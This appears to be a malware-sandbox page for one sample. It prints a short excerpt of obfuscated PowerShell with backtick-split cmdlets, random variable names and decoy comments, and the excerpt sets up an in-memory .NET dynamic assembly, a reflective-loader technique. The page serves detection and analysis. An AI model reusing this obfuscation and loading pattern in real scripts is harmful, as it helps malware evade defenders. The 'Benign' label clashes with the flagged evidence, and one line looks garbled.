Benign Download

f046d72b60bf5e3fcd977795eb533ffb23b14de1300eed699265a273d51cfa29.bin

PowerShell accesses AppDomain CurrentDomain.NET reflection marker in opaque content
SHA-256f046d72b60bf5e3fcd977795eb533ffb23b14de1300eed699265a273d51cfa29
MaleculeH(Po)Md

Evidence

.NET reflection marker in opaque content lines 427–432
427:20… r threat intelligence feed.
428 $WuGTHsnvfYntmtGERN = Ne`w`-`Object System.Reflection.AssemblyName("DebRkTLvl")
429
430# Refreshing Schedule Task xml index.
431 $PBWstWatyPqbe = [System.AppDomain]::CurrentDomain.DefineDynamicAssembly($WuGTHsnvfYntmtGERN, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
432 # Loading system resource …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.